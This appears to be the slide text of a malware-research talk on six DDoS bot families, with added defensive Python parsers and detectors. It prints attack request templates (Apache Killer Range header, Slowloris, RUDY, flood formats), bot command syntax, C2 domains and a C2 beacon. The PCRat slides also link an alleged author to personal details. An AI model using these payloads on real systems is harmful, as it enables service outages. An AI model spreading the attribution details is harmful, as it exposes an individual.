3. Agenda
• Who we are
• How and why
• DDoS Malwares
– PCRat
– DarkDDoser
– Cyclone
– Athena
– SATBot
– Cynic
• Trends and Takeaways
4. Who we are
• Dennis Schwarz
– Security Research Analyst on Arbor Networks’ ASERT
– <3 IDA Pro
– Formerly an intrusion analyst with Dell SecureWorks
• Jason Jones
– Security Research Analyst on Arbor Networks’ ASERT
– Previously of TippingPoint DVLabs
– Research interests
• IP reputation
• Malware clustering
• Data mining
5. ASERT Malware Corral
• Arbor Security Engineering & Response Team
• ASERT Malware Corral
– Malware storage + processing system
– Processing occurs via sandbox, static methods
– Tagging via behavioral and static methods
• Currently pulling in upwards of 100k samples / day
• 567 unique family names tagged last year
– Includes DDoS, RATs, Bankers, Infostealers, Targeted Threats, etc.
6. Why these malwares?
• Since someone took the time to code them, it’s only fair that we analyze them – quid pro quo
• DDoS related
• Less well known
• Our automated heuristics bubbled these up to the human analysis pile
• Special to us because we reversed them
8. PCRat – “The APT”
• Made in China
• C++
• Source code uploaded to Google Code in March 2011
– http://code.google.com/p/lszpal/
• Source code is based on Gh0st RAT
9. PCRat – Stats
• 117 unique executables
• First seen: September 14, 2012
• Last seen: February 21, 2013
• Connections, 15 unique destinations (resolved March 14, 2013)
– 75384217.3322.org (221.130.179.36 | ASN 24400 | CHINA MOBILE COMMUNICATIONS CORPORATION – SHANGHAI)
– www.91zhsq.com (118.244.170.139 | ASN 4808 | BEIJING HSOFT TECHNOLOGIES INC)
– sobor.3322.org (221.207.59.118 | ASN 4837 | CHINA UNICOM QINGHAI PROVINCE NETWORK)
– yunddos.3322.org (125.77.199.30 | ASN 4134 | CHINANET FUJIAN PROVINCE NETWORK)
– waitingfor5.gicp.net (65.19.141.203 | ASN 6939 | HURRICANE ELECTRIC INC.)
– rq778899.vicp.net (65.19.157.205 | ASN 6939 | HURRICANE ELECTRIC INC.)
– q2y.3322.org (125.77.199.30 | ASN 4134 | CHINANET FUJIAN PROVINCE NETWORK)
– cygj.3322.org (221.207.59.118 | ASN 4837 | CHINA UNICOM QINGHAI PROVINCE NETWORK)
– vipyg.3322.org (124.232.153.217 | ASN 4134 | CHINANET HUNAN PROVINCE NETWORK)
– 61.147.103.139 (ASN 23650 | CHINANET JIANGSU PROVINCE NETWORK)
– qingkuan.gicp.net (98.126.43.3 | ASN 35908 | KRYPT TECHNOLOGIES)
– Lujian111.3322.org (222.73.163.70 | ASN 4812 | CHINANET SHANGHAI PROVINCE NETWORK)
– sobor.vicp.cc (61.147.121.97 | ASN 23650 | CHINANET JIANGSU PROVINCE NETWORK)
– a944521213.3322.org (221.207.59.118 | ASN 4837 | CHINA UNICOM QINGHAI PROVINCE NETWORK)
– wjydog.3322.org (221.207.59.118 | ASN 4837 | CHINA UNICOM QINGHAI PROVINCE NETWORK)
10. PCRat – Loose Attribution
• lszpal@qq.com uploaded source code
• QQ number 449674599 from source
– Google: Lsz, StarW.lsz, lszhack, Lsztony00, unpack.cn profile, lszhack.3322.org, support@lszpal.cn
• Unpack.cn forum profile
– http://www.unpack.cn/space-username-lszpal.html
– Birthday: October 10, 1990
– Active: January 8, 2009 – March 13, 2013 (present)
– Baidu profile
12. PCRat – Loose Attribution cont.
• Baidu profile
– http://hi.baidu.com/lszhk
– Male
– 22 years old
– Lives in Shunqing District (administrative center) of Nanchong in Sichuan province
15. PCRat – Loose Attribution cont.
• 3322.org domains (resolved March 19, 2013)
– lszpal.3322.org (115.238.252.7 | ASN 4134 | CHINANET-ZJ LISHUI NODE NETWORK)
– lsz.3322.org (59.64.158.18 | ASN 4538 | BEIJING UNIVERSITY OF POSTS & TELCOMMUCATIONS)
– starw.lsz.3322.org is an alias for lsz.3322.org.
– lszhack.3322.org (221.207.59.118 | ASN 4837 | CHINA UNICOM QINGHAI PROVINCE NETWORK)
16. Aside: 221.207.59.118 Domains and Malware
• Further research on the IP is left as an exercise for the listener
• Thanks to Mike Barr of Arbor Networks for the Maltego graph
17. PCRat – Command and Control
00000000 5d 00 00 00 53 00 00 00 50 43 52 61 74 78 9c 93 ]...S... PCRatx..
00000010 f4 71 f4 73 b7 32 34 30 36 ae 09 cf cc 53 88 08 .q.s.240 6....S..
00000020 50 08 0e 30 aa 31 32 35 53 f0 75 aa f1 cc 2b 49 P..0.125 S.u...+I
00000030 cd d1 08 d2 54 88 48 cd cf 03 d1 ce 01 a1 0a 08 ....T.H. ........
00000040 e0 6a 6a 66 64 a0 a0 e0 a0 60 a4 67 62 e0 ee 51 .jjfd... .`.gb..Q
00000050 55 63 64 60 68 c4 c0 00 00 8f e3 14 0c          Ucd`h... .....
• 93 byte C struct, mostly obfuscated with zlib compression
• Bytes 0-3: total length, in bytes, little-endian (0x5d)
• Bytes 4-7: length of the zlib chunk once decompressed, in bytes (0x53)
• Bytes 8-12: tag (PCRat)
• Bytes 13-: zlib chunk
18. PCRat – Command and Control cont.
>>> # Python 2 session; the bytes are the hex dump from the previous slide
>>> data = ("\x5d\x00\x00\x00\x53\x00\x00\x00\x50\x43\x52\x61\x74\x78\x9c"
...         "\x93\xf4\x71\xf4\x73\xb7\x32\x34\x30\x36\xae\x09\xcf\xcc"
...         "\x53\x88\x08\x50\x08\x0e\x30\xaa\x31\x32\x35\x53\xf0\x75\xaa\xf1\xcc\x2b"
...         "\x49\xcd\xd1\x08\xd2\x54\x88\x48\xcd\xcf\x03\xd1\xce\x01\xa1\x0a\x08\xe0\x6a"
...         "\x6a\x66\x64\xa0\xa0\xe0\xa0\x60\xa4\x67\x62\xe0\xee"
...         "\x51\x55\x63\x64\x60\x68\xc4\xc0\x00\x00\x8f\xe3\x14\x0c")
>>> hex(len(data))
'0x5d'
>>> import zlib
>>> inf = zlib.decompress(data[13:])   # skip the 13-byte header
>>> print inf
LANG:1033|Win XP SP2|256 MB|Intel(R) Xeon(R) CPU E5620 @ 2.40GHz|
2012
>>> hex(len(inf))
'0x53'
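The session above decodes one capture by hand. As an added example (not code from the deck or from Arbor), the same header layout turned into a parser that cross-checks every field before trusting it: the total-length field must match the bytes received, the tag must be PCRat, inflation is capped so a hostile frame cannot zip-bomb the decoder, and the inflated size must match the second length field. The beacon string, the MAX_INFLATED cap and the frame builder are assumptions for the demo; SLIDE_CAPTURE is the hex dump transcribed from the previous slide and is only printed, not asserted on.

```python
import struct
import zlib

TAG = b"PCRat"
HEADER_LEN = 13          # uint32 total length + uint32 inflated length + 5-byte tag
MAX_INFLATED = 1 << 16   # hypothetical cap; a real decoder would size this for its use


def build_frame(beacon):
    """Wrap a beacon string in a PCRat-style frame using the layout on the slide."""
    chunk = zlib.compress(beacon)
    return struct.pack("<II", HEADER_LEN + len(chunk), len(beacon)) + TAG + chunk


def parse_frame(frame):
    """Parse a frame and validate every field; raise ValueError on any mismatch."""
    if len(frame) < HEADER_LEN:
        raise ValueError("frame shorter than the 13-byte header")
    total, inflated_len = struct.unpack("<II", frame[:8])
    tag = frame[8:13]
    if tag != TAG:
        raise ValueError("unexpected tag %r" % tag)
    if total != len(frame):
        raise ValueError("length field %d does not match %d bytes on the wire"
                         % (total, len(frame)))
    # Bounded inflate: stop after MAX_INFLATED bytes instead of trusting the header.
    inflated = zlib.decompressobj().decompress(frame[HEADER_LEN:], MAX_INFLATED)
    if len(inflated) != inflated_len:
        raise ValueError("inflated %d bytes, header claims %d"
                         % (len(inflated), inflated_len))
    return {"total": total, "inflated_len": inflated_len, "tag": tag,
            "fields": inflated.split(b"|")}


# Constructed beacon modelled on the slide's decoded output (not from a real infection).
SAMPLE_BEACON = b"LANG:1033|Win XP SP2|256 MB|Constructed CPU string|2012"

# Bytes transcribed from the hex dump on the previous slide.
SLIDE_CAPTURE = bytes.fromhex(
    "5d 00 00 00 53 00 00 00 50 43 52 61 74 78 9c 93"
    "f4 71 f4 73 b7 32 34 30 36 ae 09 cf cc 53 88 08"
    "50 08 0e 30 aa 31 32 35 53 f0 75 aa f1 cc 2b 49"
    "cd d1 08 d2 54 88 48 cd cf 03 d1 ce 01 a1 0a 08"
    "e0 6a 6a 66 64 a0 a0 e0 a0 60 a4 67 62 e0 ee 51"
    "55 63 64 60 68 c4 c0 00 00 8f e3 14 0c"
)

if __name__ == "__main__":
    print(parse_frame(build_frame(SAMPLE_BEACON)))
    try:
        print(parse_frame(SLIDE_CAPTURE))
    except (ValueError, zlib.error) as exc:
        print("slide capture did not parse:", exc)
```

Checking the on-wire length against the header before inflating is the part that matters for anyone writing a sandbox or IDS decoder: a length field is attacker-controlled data, and the page's own session shows the second field is the decompressed size, not the size of the compressed chunk.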
20. PCRat – DDoS Attack Commands
• ICMP Echo Request Flood
A --------- PING(1024 “I”s) ----------> B
A --------- PING(1024 “I”s) ----------> B
A --------- PING(1024 “I”s) ----------> B
…
• UDP Flood Types 1, 2, and 3
A --------- UDP(4000 “random bytes”) ----------> B
A --------- UDP(36 “hardcoded bytes”) ---------> B
A --------- UDP(1024 “A”s) -------------------------> B
…
21. PCRat – DDoS Attack Commands cont.
• TCP SYN Flood
A --------- SYN(spoofed src IP) ----------> B
A --------- SYN(spoofed src IP) ----------> B
A --------- SYN(spoofed src IP) ----------> B
…
• TCP SYN/ACK Flood
A --------- SYN/ACK ----------> B
A --------- SYN/ACK ----------> B
A --------- SYN/ACK ----------> B
…
22. PCRat – DDoS Attack Commands cont.
• TCP Connection Flood
A --------- SYN ----------> B
A <----- SYN/ACK ------ B
A --------- ACK ----------> B
close()
…
• TCP Flood Types 1, 2, and 3
A --------- TCP(1024 “random bytes”) ------------------> B
A --------- TCP(1024 “C&C specified bytes”) ---------> B
A --------- TCP(2048 “a”s) ---------------------------------> B
…
23. PCRat – DDoS Attack Commands cont.
• HTTP Request Flood Type 1
GET %s HTTP/1.1\r\n
Host: %s\r\n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15Cache-Control: no-store, must-revalidate\r\n
Referer: %s%s\r\n
Connection: keep-alive\r\n\r\n
• HTTP Request Flood Type 2
GET %s HTTP/1.1\r\n
Host: %s\r\n
Cache-Control: no-store, must-revalidate\r\n
Referer: %s%s\r\n
Connection: Close\r\n\r\n
24. PCRat – DDoS Attack Commands cont.
• HTTP Request Flood Type 3
GET / HTTP/1.1\r\n
Host: %s\r\n
Cache-Control: no-cache\r\n
Connection: Close\r\n\r\n
• HTTP Request Flood Type 4
GET %s HTTP/1.1\r\n
Content-Type: text/html\r\n
Host: %s\r\n
Accept: text/html, */*\r\n
User-Agent:Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.0; MyIE 3.01)\r\n\r\n
26. DarkDDoser
• Programmed in Delphi
• Written by HaLLaFaMeR x2
• Costs $30
• Boasts 5 Floods
– SYN flood
– UDP flood
– HTTP GET flood
– “SlowLoris”
– “ARME”
• Claims to be rewriting in C++
28. Search Warrant Email Account
hallafamerx2@gmail.com, et al
Case Number: 2:2011mc50698
Filed: June 7, 2011
Court: Michigan Eastern District Court
Office: Detroit Office
County: Wayne
Presiding Judge: George Caram Steeh
Nature of Suit: Other Statutes - Other Statutory
Actions
Jurisdiction: Federal Question
Jury Demanded By: None
29. DarkDDoser CnC
• Many CnCs using dynamic DNS
• Simple pipe-delimited protocol on random ports
– ADDNEW|Stable|5.6c|US|Windows XP x86|Idle...|3175|NEW
– ARME|192.168.56.1|www.google.com|30|5
– ARME|<IP Address>|<Host header>|<Num forks>|<Num threads>
– SLOW|192.168.56.1|192.168.56.1|<Sockets>|<Num Forks>|<Method>
– HTTP|192.168.56.1|www.google.com|1|3000|POST
– UDP|192.168.56.1|80|65|6000|6000|55|6
– STATUS|Idle…
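A protocol this simple is easy to parse, which is useful on the defensive side: a sensor that sees these verbs on a random high port can name the attack type and target from the line itself. The following is an added example, not code from the deck or from Arbor. The field names for ARME and SLOW come from the templates above; the other verbs are kept positional because the deck does not label their arguments, and the extra non-bot line in SAMPLE_LINES is constructed.

```python
import re

# Field names the slide spells out; other verbs stay positional.
FIELD_NAMES = {
    "ARME": ("target_ip", "host_header", "num_forks", "num_threads"),
    "SLOW": ("target_ip", "target_host", "sockets", "num_forks", "method"),
}
ATTACK_VERBS = frozenset({"ARME", "SLOW", "HTTP", "UDP"})
KNOWN_VERBS = ATTACK_VERBS | {"ADDNEW", "STATUS"}
LINE_RE = re.compile(r"^(%s)\|" % "|".join(sorted(KNOWN_VERBS)))


def parse_command(line):
    """Split one pipe-delimited DarkDDoser line into verb plus arguments."""
    line = line.rstrip("\r\n")
    if not LINE_RE.match(line):
        raise ValueError("not a DarkDDoser command: %r" % line)
    verb, *args = line.split("|")
    names = FIELD_NAMES.get(verb)
    if names and len(args) != len(names):
        raise ValueError("%s expects %d fields, got %d" % (verb, len(names), len(args)))
    return {
        "verb": verb,
        "is_attack": verb in ATTACK_VERBS,
        "fields": dict(zip(names, args)) if names else {"args": args},
    }


def attack_targets(lines):
    """Return (verb, target) pairs for every attack order in a stream of lines.
    Unrelated or malformed lines are skipped, which is what log triage wants."""
    found = []
    for line in lines:
        try:
            cmd = parse_command(line)
        except ValueError:
            continue
        if cmd["is_attack"]:
            # Labelled verbs expose target_ip; positional ones put the target first.
            target = cmd["fields"].get("target_ip") or cmd["fields"]["args"][0]
            found.append((cmd["verb"], target))
    return found


# Lines as printed on the slide plus one unrelated line (constructed).
SAMPLE_LINES = [
    "ADDNEW|Stable|5.6c|US|Windows XP x86|Idle...|3175|NEW",
    "ARME|192.168.56.1|www.google.com|30|5",
    "HTTP|192.168.56.1|www.google.com|1|3000|POST",
    "UDP|192.168.56.1|80|65|6000|6000|55|6",
    "STATUS|Idle...",
    "HELO not-a-bot-line",
]

if __name__ == "__main__":
    for verb, target in attack_targets(SAMPLE_LINES):
        print("attack order:", verb, "->", target)
```

The same anchored regex is what a signature for this family boils down to: a line starting with one of the six verbs followed by a pipe, on a connection that is not otherwise speaking a known protocol.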
32. DarkDDoser Basic Floods
• UDP
– Standard flood, packet size specified by CnC
– Random port
• SYN
– Not spoofed, random ports
• HTTP
GET <target URI> HTTP/1.1
Host: 10.1.10.68
User-Agent: <random user-agent from list>
Accept: */*;q=0.1
Accept-Encoding: gzip,deflate
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Referer: <random referer from list>
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
33. DarkDDoser Slowloris
GET / HTTP/1.1
Host: <website>
User-Agent: Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.102011-10-16 20:23:10
Accept: */*;q=0.1
Accept-Encoding: gzip,deflate
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Referer: www.meta.ua
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
34. Apache ARME Vulnerability
• Apache allocates range requests into buckets
• Each range allocates more memory
• A large number of overlapping range requests causes a large amount of memory allocation
• Example:
• Range: bytes=5-49,5-50,5-51,5-52,5-53,5-54,5-55,5-56,5-57,5-58,5-59,5-60,5-61,5-62,5-63,5-64,
5-65,5-66,5-67,5-68,5-69,5-70,5-71,5-72,5-73,5-74,5-75,5-76,5-77,5-78,5-79,5-80,
5-81,5-82,5-83,5-84,5-85,5-86,5-87,5-88,5-89,5-90,5-91,5-92,5-93,5-94,5-95,5-96,
5-97,5-98,5-99,5-100,5-101,5-102,5-103,5-104,5-105,5-106,5-107,5-108,5-109,5-110,
5-111,5-112,5-113,5-114,5-115,5-116,5-117,5-118,5-119,5-120,5-121,5-122,5-123,5-124,
5-125,5-126,5-127,5-128,5-129,5-130,5-131,5-132,5-133,5-134,5-135,5-136,5-137,5-138,
5-139,5-140,5-141,5-142,5-143,5-144,5-145,5-146,5-147,5-148,5-149,5-150,5-151,5-152,
5-153,5-154,5-155,5-156,5-157,5-158,5-159,5-160,5-161,5-162,5-163,5-164,5-165,5-166,
5-167,5-168,5-169,5-170,5-171,5-172,5-173,5-174,5-175,5-176,5-177,5-178,5-179,5-180, 5-181,5-182,5-183
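What makes the header above abusive is measurable: many ranges, all overlapping, adding up to far more bytes than the resource holds. As an added example (not from the deck or from Arbor), here is the check a web-server operator or WAF author can run on a Range header before handing it to the server. It counts the ranges, resolves each one against the resource size, sums the bytes asked for, and flags overlap or more than five ranges; five is the limit the Apache project's interim mod_rewrite workaround enforced at the time. Run on the slide's header (rebuilt programmatically) it reports 135 overlapping ranges requesting about 15 KB of a 1000-byte resource. The same function applies to the DarkDDoser ARME and Cyclone .arme requests later in the deck; the resource size and the max_ranges default are assumptions.

```python
import re

RANGE_SPEC = re.compile(r"^(\d*)-(\d*)$")


def parse_range_header(value):
    """Split 'bytes=a-b,c-d,...' into (start, end) pairs.
    None stands for an absent bound: '0-' is open ended, '-500' is a suffix."""
    if not value.lower().startswith("bytes="):
        raise ValueError("only byte ranges are handled")
    pairs = []
    for spec in value[len("bytes="):].split(","):
        spec = spec.strip()
        m = RANGE_SPEC.match(spec)
        if not m or spec == "-":
            raise ValueError("malformed range spec %r" % spec)
        start = int(m.group(1)) if m.group(1) else None
        end = int(m.group(2)) if m.group(2) else None
        pairs.append((start, end))
    return pairs


def resolve(pairs, resource_len):
    """Map pairs onto concrete [start, end] offsets inside a resource of
    resource_len bytes, dropping unsatisfiable ranges such as '5-0'."""
    out = []
    for start, end in pairs:
        if start is None:                      # suffix range: the last `end` bytes
            start, end = max(resource_len - end, 0), resource_len - 1
        elif end is None or end > resource_len - 1:
            end = resource_len - 1
        if start <= end:
            out.append((start, end))
    return out


def range_request_risk(header, resource_len, max_ranges=5):
    """Summarise how much work a Range header asks for and whether to reject it."""
    pairs = parse_range_header(header)
    spans = sorted(resolve(pairs, resource_len))
    requested = sum(end - start + 1 for start, end in spans)
    overlapping = any(spans[i][0] <= spans[i - 1][1] for i in range(1, len(spans)))
    return {
        "ranges": len(pairs),
        "bytes_requested": requested,
        "amplification": requested / float(resource_len) if resource_len else 0.0,
        "overlapping": overlapping,
        "reject": len(pairs) > max_ranges or overlapping,
    }


# The slide's example header, rebuilt: 5-49 through 5-183.
SLIDE_HEADER = "bytes=" + ",".join("5-%d" % i for i in range(49, 184))

if __name__ == "__main__":
    print(range_request_risk(SLIDE_HEADER, 1000))      # 1000-byte resource is assumed
    print(range_request_risk("bytes=0-63", 1000))       # an ordinary resume-download request
```

Rejecting on overlap rather than on count alone matters because the Cyclone variant shown later starts its list with "0-", so a single open-ended range plus any other range already overlaps the whole resource.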
35. DarkDDoser ARME
HEAD / HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+2011-10-16 20:21:10
Range: bytes=0-63
Accept-Encoding: gzip
Connection: close

HEAD / HTTP/1.1
Host: <target>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Range: bytes=0-36
Accept-Encoding: gzip
Connection: close
45. Cyclone – Command and Control
• IRC based (yep, still being used)
• C&C details are obfuscated using the same method as MP-Ddoser/IP Killer
• Jeff Edwards of Arbor Networks has written a decoder
47. Cyclone – Identified Command
• .login <password> - log in to bot
• .logout - log out of bot
• .rc - reconnect to IRC server
• .status - show DoS attack status
• .info - show system information
• .uninstall - remove self
• .kill - kill and remove self
• .stop - stop DoS attacks
• .dl <URL> - download and execute
• .botkiller - kill off other bots on the host
• .ftp - pillage Filezilla credentials
• DDoS attacks (described next)
48. Cyclone – DDoS Attack Commands
• .udp
A --------- UDP(2000 “digits and lowercase letters”) ----------> B
A --------- UDP(2000 “digits and lowercase letters”) ----------> B
A --------- UDP(2000 “digits and lowercase letters”) ----------> B
…
• .arme
– ARME (Apache Remote Memory Exhaustion) a.k.a. Apache Killer
attack by Kingcope
HEAD / HTTP/1.1
Host: 10.1.6.71
Range:bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,…a lot more…5-1298,5-1299
Accept-Encoding: gzip
Connection: close
49. Cyclone – DDoS Attack Commands cont.
• .layer7
– Randomly chooses out of 44 possible User-Agents
HEAD / HTTP/1.1
Host: 10.1.6.71
User-Agent: Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
Connection: keep-alive
• .slowloris
– Randomly chooses a Content-Length value between 100000000 and
510065408
– Not a proper Slowloris attack (not slow!)
POST / HTTP/1.1
Host: 68.42.70.60
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.56.5 (KHTML, like Gecko) Version/5.1.6 Safari/534.56.5
Content-Length: 429844219
50. Cyclone – DDoS Attack Commands cont.
• .httpget
– Referer is comprised of 10 random lowercase letters followed by a
randomly selected generic TLD (10 possibilities)
GET / HTTP/1.0
Host: 68.42.70.60
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Referer: z6j4ncowgj.info
• .httpdownload
GET / HTTP/1.0
Host: 68.42.70.60
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0
Referer: ypoq1xlx2s.rs
51. Cyclone – DDoS Attack Commands cont.
• .httpstrong
– R-U-Dead-Yet (RUDY) attack
– POST data is an endless stream of lowercase letters and digits
POST / HTTP/1.0
Host: 10.1.6.71
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 1000000
Referer: 7k8qhka5ym.net

eiq48mw17v3mb7...
54. Athena
• Started as IRC bot, recently evolved to HTTP
• Consistent updating
• Author contact info:
– Jabber: AthenaIRC@thesecure.biz
– MSN: AthenaIRC@hotmail.com
– ICQ: 618099251
55. Athena Pricing
• 100$ - Solitary bin of Athena built to customer-specified configuration
• 10$ - Rebuild / Update of bin
• 15$ - I will set up your IRC myself so it is most-suitable for Athena on a server of yours through TeamViewer, join.me, PuTTY, etc.
• 130$ - Ready channel spot capable of holding 20k bots and a bin of Athena
– Prices are not permanent and can be subject to change at any point in time
– After purchase, it is up to the buyer to contact either me. I will not chase you down.
– PayPal and Liberty Reserve are accepted.
56. Athena Versions / Builders
• Cracked builders for 1.8.3 and 1.8.7 available
– Version set to Athena=shit!
– Contains string “IPKiller>Athena”
– Versions from 2.1 -> 2.2 -> 2.3 observed in our corral
• Version 2 has more features
• Removes standalone btcwallet command
• Adds filesearch to accomplish that + more
57. Athena Features
• Bitcoin wallet stealing
• File search + upload
• Password stealing
• Visit website
• Download and execute file
• IRC War
• Execute commands
• “Encrypted” IP
• Encrypted commands
66. SATBOT – Stats
• 12 unique executables
• First seen: September 11, 2012
• Last seen: February 11, 2013
• Connections, 1 unique destination (resolved March 14, 2013)
– 216.86.156.135 (ip135.216-86-156.static.steadfastdns.net | ASN 32748 | STEADFAST NETWORKS)
67. SATBOT – Maybe Attribution
• IP is hosting a Website – “Stock Gumshoe: Secret Teaser Stocks Revealed”
– “Feels” shady, but could be a hacked site
68. SATBOT – Identified Commands
• auth – login
• stopddos - stop SYN flood
• info - get system information
• listproc - get process listing
• dir - get directory listing
• prd - setup port redirection
• srd - stop port redirection
• dwn - download and execute
• seeya - remove self
• websrv - start a password protected directory listing web server
• stopweb - stop web server
• terminate - terminate a process
• logout - log out
• spam - spread self via IM
• raw - echo back message
• rnb - change nickname
• syn – launch SYN flood
– Proper SYN flood
70. Aside: SYN Flood “Commands”
• A lot of them tend to be implemented as TCP connection floods
– Easier to use a connect()
A --------- SYN ----------> B
A <----- SYN/ACK ------ B
A --------- ACK ----------> B
close()
…
vs
A --------- SYN ----------> B
A --------- SYN ----------> B
A --------- SYN ----------> B
…
72. Cynic
• Bot coded in C
• Author(s) unknown
• Initially posts a request to /cynic/gate.php
• Appears to be IRC CnC after that*
• Only a handful of samples observed in our corral
73. Cynic String Encoding
• Strings are stored encrypted
• Hard-coded plain-text key
• Each string byte is XOR’d against all key bytes, then logical NOT’d
• Main decryption routine calls the decrypt routine with the key for all strings
• Strings contained
– Registry keys
– Imports
– Phone home information
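The decode rule above is worth writing out, because it shows why the scheme gives an analyst almost nothing to break. This is an added example (not code from the deck or from Arbor): cynic_decode follows the slide's two steps literally, fold_key shows that XOR-ing against every key byte is the same as XOR-ing against one folded byte, so the whole construction collapses to a single-byte XOR with the constant fold ^ 0xFF, and brute_force recovers strings without any key by trying all 256 constants. The key and the registry-path plaintext are constructed for the demo; the real sample's key is not on the slide.

```python
import string

PRINTABLE = frozenset(string.printable.encode())


def fold_key(key):
    """XOR all key bytes together. XOR-ing a byte against every key byte in turn
    is the same as XOR-ing it against this single value, so repeated key bytes cancel."""
    folded = 0
    for k in key:
        folded ^= k
    return folded


def cynic_decode(blob, key):
    """Decode as the slide describes: XOR each byte against every key byte,
    then logical NOT. The steps come from the deck; the key does not."""
    out = bytearray()
    for b in blob:
        for k in key:
            b ^= k
        out.append(~b & 0xFF)
    return bytes(out)


def cynic_encode(plain, key):
    """Inverse of cynic_decode (NOT first, then the XORs), used only to build test data."""
    out = bytearray()
    for b in plain:
        b = ~b & 0xFF
        for k in key:
            b ^= k
        out.append(b)
    return bytes(out)


def brute_force(blob):
    """Key-less recovery: the scheme is a single-byte XOR with fold ^ 0xFF, so try
    all 256 constants and keep the candidates that come out fully printable."""
    hits = []
    for c in range(256):
        candidate = bytes(b ^ c for b in blob)
        if all(x in PRINTABLE for x in candidate):
            hits.append((c, candidate))
    return hits


# Constructed key and plaintext (a generic autorun registry path, not taken from a sample).
DEMO_KEY = b"cynic-demo-key"
DEMO_PLAIN = b"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
DEMO_BLOB = cynic_encode(DEMO_PLAIN, DEMO_KEY)

if __name__ == "__main__":
    print("with key:   ", cynic_decode(DEMO_BLOB, DEMO_KEY))
    print("effective single-byte key: 0x%02x" % (fold_key(DEMO_KEY) ^ 0xFF))
    for const, text in brute_force(DEMO_BLOB):
        print("candidate 0x%02x: %r" % (const, text))
```

For string-extraction tooling this means the key length is irrelevant: a strings-style pass that XORs each blob with each of the 256 constants and keeps printable output recovers the registry keys, import names and phone-home details the slide lists, with no reversing of the decrypt routine required.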
74. Cynic CnC
POST /cynic/gate.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: ix.kasprsky.org
Content-Length: 53
Connection: Close

;.......g..........L9:..R....hb.].e....(...(.{T....jb
80. Trends and Takeaways
• Packaging of DDoS attacks in malware
– Either one TCP connection flooder tacked onto a RAT/traditional bot
– Or a package of 20-something flooders for a DDoS-specific bot
• Copy and paste culture
– Hard to classify families
• Coders not paying attention
– Lots of typos and missing pieces
– Broken implementations of attacks
• Too many flood types
– Can be tedious to reverse out the details
82. Trends and Takeaways cont.
• Hash table DoS attacks haven’t really been weaponized at the botnet level yet
– Jeff Edwards of Arbor Networks has talked about similar delays from proof-of-concept to weaponization when Slowloris, ARME, etc. were released
• Obfuscation tends to be XOR, base64, rot13, or zlib based
– Sometimes RC4 – but the plaintext key is readily available
– Everyone will reverse RC4 at least once…
– And gzip…
• C&C via IRC is still common
• Delphi code usually means Russians
• Reversing Visual Basic bots
– Oh god, my eyes!
– Rage quits
85. Trends and Takeaways cont.
• Future research will start focusing more on attribution
– Mandiant APT1 release
• PHP DDoS botnets are hot at the moment
– Triple Crown Attacks on US banks
– Effective, but the scripts themselves and the backend infrastructure seem relatively immature
• DNS Amplification attacks are also hot
– Spamhaus DDoS attacks in late March 2013
• One of the largest seen so far
• Spawned open resolver project
• Attention to “DDoS as a Service” providers will rise
– Krebs on Security DDoS/SWATing attack in March 2013
– Game booters